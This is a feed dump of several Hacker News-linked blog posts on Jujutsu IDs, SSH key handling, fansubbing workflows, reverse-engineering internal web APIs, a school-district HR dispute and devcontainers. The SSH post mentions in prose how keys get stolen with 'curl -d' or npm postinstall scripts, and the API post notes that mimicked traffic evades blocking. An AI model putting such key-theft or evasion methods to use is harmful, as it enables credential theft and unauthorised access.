    • Many backend developer jobs are tied to specific cloud platforms like AWS, Azure, and GCP, as companies often build and deploy their backend infrastructure within a certain cloud ecosystem. These roles expect hands-on experience with a specific cloud provider's services. Furthermore, getting cloud certifications of specific platforms can boost your job prospects.

    • Many backend developer jobs now include familiarity with AI models and related products (OpenAI API, Google Cloud AI, AWS Bedrock, Azure AI, LangChain, LangGraph, vector databases, etc.) as a requirement. This is to integrate GenAI SaaS into the existing backend systems.

    Companies offering high-paying packages place a strong emphasis on these skills in their job requirements:

    • Code quality and test coverage

    • Computer science fundamentals: DSA, systems design, and OS and networking (if you are writing code for the infrastructure)

    • Projects you've worked on in the past

    • Being aware of what's going on in the industry and the ability to pick the right tech for a given use case and taking ownership of your work.

    These high-paying job listings focus on your knowledge of the fundamentals and problem-solving ability as opposed to a specific tech stack. Detailed discussions on every point will be added soon to this resource.

    Furthermore, in case you are overwhelmed reading the industry expectations :) don't be. Though the expectations are vast you need not know every little thing in detail. There is a specific route you can follow to minimize your grind and bag a sublime backend developer job in the industry.

    I'll be discussing all that in the near future. If you wish to be notified of the new additions to this resource, you can subscribe to the newsletter.

    Furthermore, don't forget to share this with your network for more reach. It will keep me motivated to update this resource actively. You can also follow me on X.

    I'll see you around.

    ]]>
    https://softwareengineering.live/backend-developer hacker-news-small-sites-43194654 Thu, 27 Feb 2025 14:26:50 GMT
    <![CDATA[Why Are Jujutsu's ID Prefixes So Short?]]> thread link) | @todsacerdoti
    February 27, 2025 | https://jonathan-frere.com/posts/jujutsu-shortest-ids/ | archive.org

    Contents
    Contents

    Jujutsu is a relatively new version control system that is designed around working directly with commit-like objects called “changes”1. Each change has an ID, and these IDs are important because they’re the main way of referring to different changes2. To make referencing these IDs a bit easier, Jujutsu often shows ID prefixes rather than the whole ID when displaying commits (such as in the jj log command).

    This is similar to how Git can show an abbreviated commit hash, (typically 7-8 characters), but in Jujutsu, the ID prefixes are often 1-2 characters long. But a repository in Jujutsu can have thousands of changes in it. How can the prefixes stay so small?

    Anatomy of a Change ID

    Every change in Jujutsu has a change ID. If you run jj log, you’ll see an abbreviated set of changes, and at the start of each entry in the log will be the change’s ID. This will usually be printed out something like this:

    lnwzpvxn
    spxyzulm
    swllwvql
    oqumxxyr

    A change ID is always made up from the letters k-z, which explains the “back half of the alphabet” feeling that these IDs have. In the code, this is sometimes described as reverse_hex, because it’s the same as hexadecimal notation, just starting from the back of the alphabet instead of the front.

    Change IDs are generally 16 bytes long. This is actually configurable based on the backend, but the Git backend (which is the one most people use) has this value set to 16 bytes, so that’s what you’re most likely to see. When displayed in the UI, though, the default template only shows the first eight bytes (or eight characters of the hexadecimal format).

    Showing only the first eight characters of the ID is fine, because when referencing a change ID (for example when doing something like jj new -r <id>), we don’t need to write the entire ID, we just need to write a unique prefix. As long as no other change starts with the same sequence that we’ve used, Jujutsu knows which commit we’re referring to. Given that there are roughly 280 trillion possible eight-byte sequences, the short ID is almost certainly unique, even for very large repositories.

    Jujutsu goes a step further, though. The eight byte prefix is probably unique, but for every ID, Jujutsu also displays the specific prefix that is guaranteed to be unique for that change. When showing the ID in the terminal (and in the example IDs above), this is the part of the ID in bold.

    How does this work? And why, for most of the changes that you’ll use regularly, is the prefix mostly only one or two characters?

    Indexes in Jujutsu

    Jujutsu has a concept of indexes. Actually, Jujutsu has a number of indexes. If I’m honest, the indexing code is complicated to navigate around — I think this is partly the use of traits which make figuring out starting points more difficult, and partly because the indexing code is not very well documented right now. As a result, I will try and explain things as best I can, and I’ll let you know when I get stuck!

    We can start by asking what indexes are used for. From what I can tell, the indexes resolve and identify prefixes for commit and change IDs. Roughly, we can imagine a big long list of IDs, all sorted alphabetically based on the ID itself. When we want to resolve a prefix for a change ID, we can do a fairly-efficient binary search on the data to identify the full ID, and we can use that ID then as an index into other stores.

    The result might look something like this:

    00138948d32bee69319bf096a00d2b7c
    17a7166c862e79d7efe5b36d8b58a90b
    b704840fc5605d522ae6a7a5d09a38fd
    bc4e63c300bb28e899e31f11fe54f67b
    be3a486b7697d5d24f15e1634ed37fe8
    d29b12e490af660a2f2533088389f737
    d2d3105278d430876c07ea9767c7a28d

    Here, if I wanted to look up the prefix “d29”, I would start in the middle (with “bc4e…”), and see that my ID is greater than that number (because “d” > “b” in hexadecimal notation). I can repeat this process, starting with the ID that’s halfway between the end of the list and the ID I just looked at (in this case “d29b…”). This starts with the prefix that I was looking up, so I know I’ve found the right ID3.

    The other side of this is, if we know the ID of a change, we can find out the shortest unambiguous ID by first looking for the ID, and then looking for its neighbours. For example, if I want to find the shortest possible prefix for the commit “bc4e…” in the above list, I can look at its neighbours and see that, while they both begin with “b”, neither begins with “bc”, and therefore I know that I can display “bc” as an unambiguous ID.

    This is the simple version. In practice, there are multiple indexes. They all use the principles above (I believe), but in different ways.

    • The “readonly” index stores all the IDs in a binary file. It knows how many IDs are stored in the file, and how long each ID is, so it can perform an efficient binary search on the data. Unfortunately, the format of the file does not appear to be well-documented, but I believe it contains separate indexes for commit IDs and change IDs. There also appears to be a graph-like data structure, but I’m not sure what this is for.
    • The “mutable” index stores commits and changes in two in-memory B-trees. The mutable index can also reference a parent readonly index, which I assume is for the case where you start with an existing readonly index, and want to only store the changes made to that index, and not duplicate it entirely.
    • The “composite” index is made up of multiple nested index segments. I believe this is an optimisation technique: rather than have one single index file with every single ID every made in it, you instead split the files up and check each file individually when trying to do a lookup.

    This all explains (somewhat) how Jujutsu can efficiently look up changes based on a prefix, and how Jujutsu can show you what the unique prefix for any change is. Unfortunately, it doesn’t answer the original question.

    In a repository with thousands of commits (such as that of Jujutsu itself), it’s very likely that most change IDs will require 4-5 character prefixes. If you clone the Jujutsu repository and run jj log "all()" (i.e. showing all changes in the repository), you’ll see most of the highlighted prefixes are quite long. But run jj log without any arguments, and you’ll see that the highlighted prefixes are typically only one or two characters long. What’s going on?

    The Secret Fourth Index

    The trick is that there’s actually a fourth index in Jujutsu, but it’s separate from the other indexes. This is the ID prefix index. This index is a partial index — it only covers a specific subset of IDs, and if it can’t find a given index, it delegates to the main repository index (that contains all the possible IDs).

    The ID prefix index is initialised with a revset, which is like an SQL query but for Jujutsu changes. For example, you might write bookmarks() & author([email protected]), which would resolve to all changes in the repository that (a) are labelled directly by a bookmark, and (b) have “[email protected]” as the change author. This revset language is a powerful way to describe different sets of changes, and it’s used extensively in Jujutsu. Commands that take an ID (e.g. jj new -r <id>) generally also take a revset that can describe multiple commits (e.g. jj new -r 'all: bookmarks() & local()' will create a new commit that merges together all your local bookmarks — a surprisingly powerful and useful technique called a megamerge)4.

    Revsets are also used a lot for configuration. When running jj log, only a subset of changes get shown — typically any local branches, the currently active change, and the trunk change (i.e. main/master/trunk). By default, this subset is defined in the default Jujutsu configuration as the following revset:

    present(@)
      | ancestors(immutable_heads().., 2)
      | present(trunk())
    

    Any change that matches this definition will get shown in the log5.

    The ID prefix index gets passed a revset like the log one. In fact, by default, it is the log revset. This is usually very convenient: the default log revset shows the changes in the repository that you’re currently working on, so it makes sense to want to quickly reference these changes. This flow of checking the log to see the current change IDs, and then using jj squash or similar commands to manipulate them is so common that the bare jj command is by default aliased to jj log. However, if you want to change it, you can directly set the revsets.short-prefixes configuration setting to the revset query of your choice.

    Conclusion?

    To sum up, most of the short ID prefixes that you will use in Jujutsu can be short, because Jujutsu creates an index out of only the active changes, and consults this index first when looking up ID prefixes. The definition of “active changes” can be defined using a query language, and is configurable under revsets.short-prefixes.

    About halfway through writing this article, I realised that the answer already exists in the documentation: in the section on “Display of commit and change ids”, there is the line “To get shorter prefixes for certain revisions, set revsets.short-prefixes”, followed by an example that prioritises only the current change and its “branch”.

    But I enjoyed my journey to finding out the answer more, and I’ve ended up a lot more familiar with the Jujutsu codebase, and how Jujutsu works as a result.


    Share this article on Reddit, X/Twitter, Bluesky, Hacker News, Lobsters.

    Comments, thoughts, or corrections? Send me an email at jonathan.frere@example.com.gmail.com or contact me on social media.

    Previous Discussions

    ]]>
    https://jonathan-frere.com/posts/jujutsu-shortest-ids/ hacker-news-small-sites-43194600 Thu, 27 Feb 2025 14:19:40 GMT
    <![CDATA[You can not lose your key, if you drop it first]]> thread link) | @imcotton
    February 27, 2025 | https://blog.imcotton.xyz/my-ssh-folder-has-no-private-keys | archive.org

    SSH #

    🌶 I have a hot take:

    The ~/.ssh folder should NOT contain private keys.

    A private key is generated on the first day of computer setup and remains there permanently. It will have mode 600 if not misconfigured and may also have a passphrase for protection (you do... do you?).

    So, what's the catch?

    During its entire lifespan, which can be months or even years, those private keys can be compromised in just seconds.

    This can occur if someone types curl -d in the command line on your behalf during a coffee break, or if an NPM package with numerous intermediate dependencies' postinstall scripts sends it elsewhere.

    Even if a passphrase is used for protection, it’s crucial to consider the strength of that phrase against offline brute-force attacks.

    ssh-agent to the rescue

    If you've enabled AddKeysToAgent and UseKeychain in your ~/.ssh/config file, you can safely remove your private key from the disk after it's automatically added to the ssh-agent (verify by ssh-add -L). This protects against various attacks; however, if you reboot your system, you'll need to set everything up again.

    Thus, the reproducible key generation comes into play.

    Instead of relying on entropy from /dev/random and expecting the end user to manage it securely indefinitely (how?), let's use a well-configured CSPRNG with better algorithms to generate the same private key on demand. Once the private key is added to the ssh-agent, just delete it from the disk. This greatly reduces the attack surface.

    No private key left means nothing to leak in the first place.

    YOU CAN NOT LOSE YOUR KEY
    the roll-safe meme guy
    IF YOU DROP IT FIRST

    Moreover, if you do not regularly need to establish an SSH connection, you might consider skipping the entire ssh-agent setup.

    Additionally, backing up your private key using this method is much more reliable, and it remains effective even without specific security concerns.

    The final piece of the puzzle is creating a manageable salt/passphrase for CSPRNG, this can vary based on your threat model. I will provide a few examples for inspiration, but you should choose what works best for you:

    UUID #

    generated from system entropy, put into ~/.ssh/config as a vague comment yet you can retrieve it later on

    3c5ae80b-99a6-4449-85a0-3610a0700082
    

    Password #

    strong password from password managers and safely stored across multiple devices

    Yi#uHvMQ1/.nH7pKp'TvA-dw-=97%4fWFd$3
    

    Git Commit #

    any git commit hash that is unrelated whatsoever, this can come from one of your side projects or even some opensource project, as long as you don't lose the trace from your mental memory

    e8f897f4afef0031fe618a8e94127a0934896aba
    

    --- Linux Kernel tag v6.8

    Blockchain #

    Merkle Tree root hash from any given height of blockchains

    d249b4edbc844fca9681cfce708a28afe6621ed402e9ca693a36ff563d6d15ec
    

    --- Bitcoin block at height 835,485

    Checksum #

    specific version of any pkg (npm or crate, etc...) tarball's checksum

    sha512-OJwEgrpWm/PCMsLVWXKqvcjme3bHNpOgN7Tb6cQnR5n0TPbQx1/Xrn7rqM+wn17bYeT6MGB5sn1Bh5YiGi70nA==
    

    --- npm esbuild@0.20.1

    or

    8666f87015685834a42aa61a391303d3bee0b1442dd9cf93e3adf4cbaf8de75a
    

    --- crate tokio@1.25.3

    Pi digits #

    chunk of pi digits

    641260024379684543777339026472512819
    

    --- 36 digits of Pi at 100,000th

    Calculation #

    two of your favorite numbers multiplied and squared

    232371981027000771278400
    

    --- (735560865535) 2

    etc...

    All the above options are for demonstration purposes only. One should carefully evaluate and choose what suits them best.

    Deno #

    The program is released on JSR1 and designed to be executed by Deno which is secure by default, it reads from command args and emits to stdout, without any file, network, or environment access.

    Deno's default security guarantees are important for programs like this, using as APIs from Node.js or Bun is possible, but not recommended or tested, use at your own risk.

    Credit to Paul Miller by his package2 for the heavy lifting, it also has additional functionalities like PGP, OTP, and IPNS, among others; head over to find out more.


    ]]>
    https://blog.imcotton.xyz/my-ssh-folder-has-no-private-keys hacker-news-small-sites-43194541 Thu, 27 Feb 2025 14:13:58 GMT
    <![CDATA[Git for Fansubbing: Probably a Mistake]]> thread link) | @todsacerdoti
    February 27, 2025 | https://redvice.org/2025/git-subbing-was-a-mistake/ | archive.org

    Fansubbing has, since I stopped actively subbing, heavily migrated from an FTP-focused workflow to a Git-based one. I have long harbored suspicions that this was a bad idea on net, but having a recent opportunity to watch a group sub a show convinced me that a longer explanation of my position might be useful.

    History

    First, I have to explain the historical workflow. Everyone in a group has access to an FTP server, where the workraw[1] and premux[2] are both uploaded to a folder for the episode as they are encoded. The translator will generally type out the initial script into an Etherpad clone[3], along with all the signs and timestamps. The typesetter(s) will complete the signs in the pad, marking them off as they go, and uploading the file containing the signs to the FTP when completed with a filename like showname_06[ts-ryan].ass and all the fonts they used. The timer will take the dialog from the pad and time it in Aegisub, splitting where appropriate, and upload a showname_06[time].ass file along with their chosen dialog fonts, and usually copy over the OP and ED files from previous episodes as part of this. Editing can happen either in the pad (my preference) or after timing, in which case there’d also be a showname_06[edit].ass file dumped in the folder. Translation checking was also handled both ways, when applicable. Finally, the QC will merge the typesetting and finalized dialog and upload a showname_06[merged].ass, and they or others will upload showname_06[qc].ass and potentially successive versions with changes in response to the QC pass[4][5]. Finally, someone took the final version, muxed everything together in mkvtoolnix, made a torrent, and threw it up on Nyaa. Show released!

    Changes

    Since then, there have been two major changes to the workflow.

    The first major change is migrating to Git for a lot of the process. This was, as best I can tell, done in response to the host of different versioned files that would be dumped on the FTP. Some people felt that version control was a better solution, and Git was chosen for that purpose as it was by this point effectively the standard in software engineering.

    The second is automating the actual release process much more heavily, in an effort to stamp out issues like forgetting to mux fonts, incorrect naming, and merging the wrong scripts. This workflow change seems conceptually positive to me; even if I have gripes with some of the specific tools used for it[6], we were previously at a suboptimal level of release automation. I want to be clear that this is theoretically separate from the migration to Git, and the benefits of automated releases can be accrued independently. The existing tools tie the two together, but I consider them overcomplicated and don’t believe the marriage is intrinsic. There’s nothing stopping people from using a standardized naming scheme on FTP and a more straightforward tool to simplify the merge, muxing, and release processes.[7]

    My core contention is that because the same person made the general tooling improvements and some of the tooling that enabled a Git workflow, people mentally link them and adopt the less useful portion (Git) unnecessarily. I also claim that the existing tools are overly generic and difficult for most people to use.

    Strengths

    I’ll start with what Git’s theoretical strengths: it offers a single latest version of any file going into a release, with a clear history of changes to it, and enables concurrent editing to a file. If you’re using Github, the pull request process also offers a way to review QC changes, creating a middle ground between the QC purely taking notes and the QC applying changes directly. It also creates nice web-based diffs automatically, which makes it generally easier to review others’ work.

    Unfortunately, I’m not convinced these are particularly great benefits. Having a single latest version of a file is useful, but wasn’t a big issue in practice on the FTP, even if showname_ep06[qc][final][v3][no but for real this time].ass looks goofy, and could have been dealt with by standardizing naming (enforced by a release bot). Similarly, the concurrent editing is nice in theory but in practice does not come up very often if you’re separating dialog and TS.

    I’m also not sold that the version history matters much at all for subbing. I’ve almost never seen it referenced due to the fundamentally short-term nature of these releases. In the scenario you’re looking to change something for the Blu-rays, it’s usually not long after the project and the staff can just search in the channel to read the discussion, if one ensued. You do ensure that the version history is never accidentally overwritten, which is much easier to do on accident with an FTP, but if it doesn’t matter much either way I don’t consider the occasional mistakes to be of much consequence.

    Finally, the pull request process seems mildly beneficial but again not all that great. Most of the changes aren’t actually discussed in context on the site, and instead are discussed in the staff channel in Discord, and even a competent QC will probably leave some changes to the original typesetter, so you’ll end up with the good ‘ol process of pinging the typesetter to push changes anyway. This, and similar workflows borne of the diffs being intrinsic to git, is probably the strongest argument for Git, though I personally know a lot of people that don’t like it and don’t take advantage of this at all. It seems great for some groups, particularly ones composed heavily of programmers comfortable with Github, but probably not great for the median project.

    Problems

    Now that I’ve talked about the benefits and why I consider them minimal, what about the downsides?

    The biggest one is that Git is really difficult to use. If you think otherwise, you probably don’t understand it very well. Software engineers are overrepresented in fansubbing, so basic familiarity is not uncommon for many of the staff, but even then in practice every group has someone whose part-time job is unfucking the inevitable messes Git produces. And for people who don’t work in software, which includes many of the translators[8], Git means punching in arcane commands or dealing with an extremely complicated GUI, and occasionally getting into a bad state and begging a team member to help[9].

    It also necessitates further mandatory tooling setup to contribute to a project. In practice, everyone still uses an FTP for the premuxes[10], so getting Git installed locally along with a GUI, making a Github account, and getting this all running is an extra step for every non-programmer to muddle through. You’re also putting your questionably legal fan translations on Github, which has so far been fine but I personally have reservations about. Also unlike when typesetting gained increased tooling requirements, these offer no improvement (hopefully) to the final output. It’s theoretical minor efficiency, and minor consistency, improvements, in exchange for a more complicated toolchain pushed onto the entire group. The tradeoff is quite different.

    It also makes it surprisingly easy to leak personal information if a group wants to make a repo public. There’s an extra manual step of checking to see if anyone used identifying information in their commits, and rewriting the history if so.

    Finally, as mentioned earlier, Git adoption seems to have been tied originally to SubKt[11], and more recently also muxtools. Both of these are monsters, and are so generic that they force every group to have someone comfortable in Kotlin or Python, respectively, to set up and maintain them for every project. In practice this means that similar to Git, every project ends up needing someone whose part-time job is tech support. These tools are difficult to set up and CLI-only, so good luck to anyone who has to interact with them that isn’t a programmer!

    Looking forward

    I think the situation has gotten sufficiently bad that groups have actually ended up in a worse place than the historical FTP-based workflow. I view the current situation as programmers responding to their dislike of manual processes by pushing incredibly complex tools on non-technical users for very marginal benefits (and very likely negative time saved).

    What would a better world look like? A more opinionated tool, with YAML or some equivalent for configuration, running as a bot on a server with an FTP and enforcing a standardized naming scheme, and with less magical mega-merging and more checks to make sure everything necessary is present as part of a release, alongside the more rote aspects like muxing and uploading. It should opt for manual processes over automated ones for anything too complicated, and try hard to be straightforward for a nontechnical user. This means it has to be a single binary on Windows/MacOS, packaged in an installer, and have a GUI for editing the configuration and generating a release. No more “just learn python lol”. There’s a world where we have tooling that’s strictly better than the old workflow, but we aren’t there today.


    Thanks to Petzku for reading a draft of this post.

    ]]>
    https://redvice.org/2025/git-subbing-was-a-mistake/ hacker-news-small-sites-43194496 Thu, 27 Feb 2025 14:07:27 GMT
    <![CDATA[A New Web is Here: Unified by AI]]> thread link) | @richardzhang
    February 27, 2025 | https://integuru.ai/blogs/newweb/newweb.html | archive.org

    Introduction

    OpenAI released Operator last month, its first computer-using agent that controls software like a human. Others have come before, from both bigger companies and startups, like Anthropic’s Computer Use, Skyvern, and Browser Use. While this launch is exciting for consumers, it’s equally as intriguing for developers. In particular, developers are wondering: Are these agents the best way to control external platforms when official APIs don’t exist?

    In more technical terms, we’re talking about “integrations”, which refers to the process of enabling an application to communicate and interact with another platform. Traditionally, integrations are done via APIs, but now, with Operator and others, agentic browser automation is an additional way to integrate. Here, we will compare the different options and discuss the pros and cons of each.

    Three ways to integrate with web platforms that lack official APIs:

    1. Agentic Browser Automation: using a browser automation agent with step-by-step reasoning.
    2. Hardcoded Browser Automation: hardcoded browser automation script.
    3. Internal API Connection: reverse-engineering the platforms’ internal APIs.

    Here’s a chart comparing the 3 options today:

    Chart comparing present-day integration options

    (1) Agentic Browser Automation

    Agentic Browser Automation, like Operator, is the most flexible approach because an agent can theoretically use any UI designed for a human. When working properly, the agent should perform any actions on any platform even when visiting it for the first time. Agentic Browser Automation’s step-by-step reasoning is great for handling unforeseen platforms and use cases, but it also has drawbacks: reliability and latency.

    Reliability issues root from hallucination. Anthropic’s Computer Use famously took a break in the middle of a task to look at photos of Yellowstone National Park. However, we can be confident that hallucinations will reduce as models improve.

    Latency, the time it takes to accomplish a given task, can increase due to reasoning speeds and infrastructure challenges. Introducing reasoning to every step means the agent needs to think on every page. This causes both increased errors and time delays. While we expect reasoning speeds to improve, browser automation infrastructure is the harder part to speed up irrespective of foundation model improvements. To enable browser automation, developers need to spin up browsers and wait for each page to fully load before triggering actions on the page. The typically long time it takes to spin up browsers is called the “cold start problem”, which is solvable with third-party services. However, the main chunk of the latency comes from page load times, which is much harder to accelerate.

    In practice, many actions are at least 3-4 page clicks away. For instance, to download a bank statement, one needs to select a bank account, go to the “statements” tab, and then select the relevant month. These cumulative steps can cause 30-40 seconds of latency to download just one statement. A typical workflow, like downloading all available statements, can comprise multiple smaller actions, therefore accumulating each action’s time delay.

    (2) Hardcoded Browser Automation

    Hardcoded Browser Automation is a more direct approach than the agentic alternative. Instead of dynaimically reasoning through each step, developers program fixed scripts to navigate a platform — clicking buttons, filling out forms, and manipulating data based on known UI structures.

    Common tools include Puppeteer, Playwright, and Selenium. The scripts follow a predefined flow: (1) spin up a browser, (2) navigate to specific URLs, (3) locate elements using CSS selectors or XPath, and (4) execute actions. This approach yields lower latency than Agentic Browser Automation due to a lack of AI reasoning at every step.

    However, Hardcoded Browser Automation suffers from the same core limitations as Agentic Browser Automation: lower reliability and higher latency. Platforms often update their frontend code, changing element structures and class names, or requiring new user interactions (e.g. CAPTCHAs). This causes the scripts to break during UI changes. Latency remains an issue as well because these scripts still require spinning up browsers and waiting for pages to load.

    In short, Hardcoded Browser Automation trades flexibility for speed but is still limited by the fundamental problems of browser-based automation.

    (3) Internal API Connection

    Internal API Connection is the most reliable and low-latency approach. It is best for products that need the most performant integrations possible. Every web application has internal APIs — hidden interfaces that let the frontend and the backend communicate and power everything behind the scenes. Instead of relying on the frontend, Internal API Connection sends needed requests straight to the backend, avoiding browser-based automation’s latency and reliability issues.

    Internal APIs change less frequently than frontend elements because they tend to remain stable and support core platform functionalities. These requests are also harder to detect and block because they closely mimic the platform’s network traffic. This means higher integration reliability.

    Since requests are directly sent to the backend, Internal API Connection doesn’t require spinning up browsers or waiting for pages to load. Even actions hidden behind many pages on the UI can trigger in seconds. This approach is the fastest of the three, adding only a few seconds on average to the platform’s native request latency.

    Since internal APIs aren’t publicly documented, developers must reverse-engineer them by figuring out how a platform’s frontend communicates with its backend. This means digging into network requests to uncover hidden endpoints and data structures. Tools like Chrome DevTools, mitmproxy, and Burp Suite help capture and analyze these requests, but even with these tools, the process is still quite complicated. Platforms often encrypt payloads, generate authentication tokens on the fly, or intentionally scramble API traffic to make reverse engineering harder. Understanding these patterns takes patience, technical expertise, and trial and error.

    Due to these difficulties, Internal API Connection is the most technically challenging approach. Unlike browser-based automation, it requires highly custom solutions for each platform, which leads to less flexibility and higher setup costs.

    To ease the resource-intensive work of Internal API Connection, Integuru created the first AI agent to automate reverse-engineering internal APIs and generate the entire integration code. Given how difficult reverse engineering can be, automation significantly reduces development costs and helps companies reap the benefits of Internal API Connections without sacrificing development resources.

    A Hybrid Approach: Adding Agentic Browser Automation

    Agentic Browser Automation doesn’t need to be a standalone approach; it can also enhance the other two methods’ maintenance processes. Instead of introducing Al reasoning at every step, developers can use it only when needed for maximum efficiency.

    For Hardcoded Browser Automation, Al agents like Operator can be deployed when scripts break. Developers can run the agent to complete the desired action and then use its recorded steps to generate an updated script. This hybrid approach reduces maintenance overhead and thereby increases reliability. However, it’s important to note that the fundamental latency issue within browser-based automation still persists.

    For Internal API Connections, Agentic Browser Automation can also help with maintenance. When websites change their internal APIs, a web-browsing agent can redo the desired action, triggering the relevant network requests along the way. At that point, a reverse-engineering agent like Integuru can analyze the newly updated network requests to generate a working integration.

    By introducing Agentic Browser Automation when needed, developers can minimize reasoning speeds and errors while maximizing reliability. We can expect most approaches to involve Agentic Browser Automation at some level in the near future.

    Choosing the Right Approach

    So when is the best time to use browser-based automation (including Agentic Browser Automation and Hardcoded Browser Automation) vs Internal API Connection?

    Given its flexibility, browser-based automation is best for cases where there is a high quantity of platforms and/or actions to automate, including scraping. For instance, when a company needs to scrape thousands of websites or streamline a workflow across dozens of platforms, browser-based automation is the easiest and fastest approach. Agentic Browser Automation is also the only way to deal with unforeseen cases as of now. Or, if you’re a small team trying to spin up automation quickly and willing to accept the trade-offs, manually writing hardcoded UI-based scripts can be much faster.

    On the other hand, if you need specific functionalities on specific platforms and integrations are core parts of your product, Internal API Connection should be the top choice. For example, an AI voice agent should reverse-engineer an electronic health record (EHR) system that lacks official APIs if it wants to check, schedule, and cancel patient appointments. In this example, low latency and reliability are especially important because humans are waiting on the line, and reducing errors is important for the product's usefulness. In essence, if you know exactly what you need and you’ll use those actions repeatedly, Internal API Connection is the most effective approach.

    Looking Ahead

    Over time, both browser-based automation and Internal API Connection will improve alongside foundation model improvements. Models will have faster reasoning speeds and become more accurate at browsing the web, resulting in higher reliability and lower latency for browser-based automation. With efforts from companies like Integuru that also benefit from model advancements, Internal API Connection will become more flexible and approachable. In other words, the two categories will see drastic improvements.

    Here’s a chart showing where the future is heading:

    Chart comparing present-day integration options

    Closing

    At Integuru, we’re the first company to use AI to better the Internal API Connection approach. While we focus on improving this method, we don’t shy away from recommending teams to choose another approach when we sense a better fit elsewhere. Our goal is to make the web interoperable, which enables better products and experiences for all. We’d love to hear your ideas and feedback as we continue shaping the future of integrations. Let’s build a more connected world together.

    ]]>
    https://integuru.ai/blogs/newweb/newweb.html hacker-news-small-sites-43194260 Thu, 27 Feb 2025 13:40:00 GMT
    <![CDATA[The Great HR Escape:Dodging Decisions in Anglophone East]]> thread link) | @raindropsz
    February 27, 2025 | https://raindropsandsunshine.ca/the-great-hr-escape/ | archive.org

    A concerning trend has come to light regarding the treatment of special needs students in the Anglophone East School District. It appears that the HR department is actively circumventing agreements that were made by The Human Rights Commission and Lawyers in favour of these children. This raises serious concerns among parents, advocates, and the community.

    HR

    All students deserve the support they need to succeed in their academic journey, especially those with severe autism. It’s disheartening when schools fail to provide the necessary accommodations, making students and families feel lost. When every other avenue has been explored, filing a human rights complaint may be the final step to getting the help that they deserve.

    If a student with dyslexia is not provided with additional time to complete reading and English assignments, they may struggle to keep up with their classmates and fall behind in their studies. Some have even been manipulated into taking courses that do not meet their needs solely for the benefit of others. Similarly, if a student with autism is not given access to a dedicated trained EA. They may have difficulty managing their behavior and engaging in classroom activities. This results in a parent having to spend more time picking up their child from school. This will prevent some parents from working.

    Dragging Their Feet

    The Human Resource complaint process is supposed to be a mechanism for addressing issues of discrimination, harassment, or other violations against students or staff. However, it seems that in the case of the Anglophone East School District, the HR department in some cases is using this process as a means to block special needs students from accessing the support they are entitled to, by implementing an administrative block to prevent a student working with their compatible EA.

    How HR circumvents decisions and negatively impacts special needs kids is by delaying the process. When an HR complaint is filed, there are supposed to be strict timelines for resolution. However, it has been reported that HR is dragging its feet, causing unnecessary delays and creating additional stress for the families caught in the backlash. This tactic not only prolongs the suffering of the students and in some cases prevents a special needs student from graduating, but also discourages others from coming forward with their valid Human Rights complaints due to concerns about retaliation.

    The Impact on Special Needs Students

    The School District’s HR department’s behavior can have a big impact. Students with special needs already have a tough time in school. When their rights are not respected, it makes things even harder for them. By cutting off their access to vital support like dedicated EAs, these students can’t reach their full potential.

    Additionally, the message being sent to these students is one of disregard and disrespect. By dismissing their parent’s concerns and dragging out the resolution process. HR is essentially telling these students that their opinions don’t matter. This can have lasting negative effects on their confidence and mental well-being.

    What Can be Done to Address This Issue?

    Action needs to be taken to address this troubling behaviour of the Anglophone East School District’s HR department. Parents, advocates, and concerned community members can come together to demand accountability and transparency. By shining a light on these practices and advocating for change. We can ensure that special needs students are given the respect and support they deserve.


    Decisions made against special needs kids’ best interests are deeply concerning. Steps must be taken to rectify this situation and ensure that all students, regardless of their abilities, are treated with dignity and respect and can be supported with accommodations that meet their needs and not what is convenient for the district. By standing up for the rights of these vulnerable children, we can create a more inclusive and supportive educational environment for everyone.

    Disclosure: This article is accurate and true to the best of the author’s knowledge. Content is for informational or entertainment purposes only and does not substitute for personal counsel or professional advice in business, financial, legal, or technical matters.

    ]]>
    https://raindropsandsunshine.ca/the-great-hr-escape/ hacker-news-small-sites-43194191 Thu, 27 Feb 2025 13:28:55 GMT
    <![CDATA[Devcontainers: I love you, I hate you]]> thread link) | @fbuilesv
    February 27, 2025 | https://www.mitchellrysavy.com/blog/2025/02/26/devcontainers.html | archive.org

    When I joined GitHub in 2021, they were on the cusp of launching GitHub Codespaces. Codespaces is one part cloud IDE, one part VM; the key selling point is that you can go to any Codespaces-enabled repo in your browser, click “New Codespace,” and you’ll be launched into an environment where you can write, test, and commit code, without a lot of setup. This is powered primarily by Visual Studio Code’s devcontainer feature.

    After the public launch, there was a push to get teams using Codespaces internally, and as the New Guy, I started refactoring our codebase to work in a devcontainer (and thus, Codespaces.) I’m not normally someone who jumps on every hype train that passes by, but the value proposition of Codespaces and devcontainers was immediately evident to me. The setup process for GitHub at the time was extremely convoluted and seemed to always require one more CPU fan than my laptop had available.

    Early Infatuation

    Outside of work, Codespaces was not free at the levels I required, so I didn’t really use it. However, devcontainers are just a feature, and I still found them useful. I added one to geneac which was useful when I solicited contributions for Hacktoberfest. One particularly awesome use case for a containerized development environment is the ability to pin to certain versions of an environment, like I did for ProjectBlazt, so I would be able to build it against the toolchain I needed in the future.

    Papercuts

    When everything is set up properly, and the stars are aligned, everything works great. Contributors start up VS Code, get a little message to open the folder in a devcontainer, and within a minute or so they’re ready to code. Unfortunately, this is rarely the case…

    Docker

    Setting up Docker is, in theory, pretty easy. On Windows and Mac, there is Docker Desktop, which is free with some restrictions. On Linux, it should be even easier since it is usually in the distro’s packages, or, if not there, you can install it from the upstream packages directly.

    In practice, the best experience I’ve had as a developer by far was using Docker Desktop on a Mac. Docker Desktop creates a Linux virtual machine in order to run Docker, and however that works under the hood on Mac1 was very reliable and rarely caused issues. On Windows, it uses Hyper-V, which is… fine… but there are quirks you need to learn about here to. For example, did you know that mounting a folder from Windows into a Docker container is dog slow? The “workaround” here is to use the WSL2 integration, clone your repo in your distro there, and then run the devcontainer from WSL2.

    On Linux, where the overhead is much lower (no need for a separate VM!) the situation is unfortunately worse. If your container setup is doing funky stuff with permissions (like BLIS is) then you need to be careful, since changes in the mounted filesystem directly affect the underlying files too. Other than that, things worked as expected in Ubuntu… but then I switched to Fedora, which uses SELinux. If Docker and SELinux were in a relationship, their Facebook status would be “it’s complicated.” I think it’s possible to reconcile them, but rather than spend the time doing that, I now just use an Ubuntu VM, running Docker, from which I can run my devcontainers.

    Features

    As devcontainers matured, “Devcontainer Features” were added. These are supposed to be one-liners you can add to your configuration that setup things like SSH, Python, Java, Docker (that’s right: you can run Docker in Docker!), etc. Although I do use them, I am a little confused about the niche they fill. At best, it moves a pile of bash from something that you maintain to something that somebody else maintains. At worst, it’s another external dependency that becomes a vector for breakage when you change your base container image to a distro it doesn’t support.

    Speed

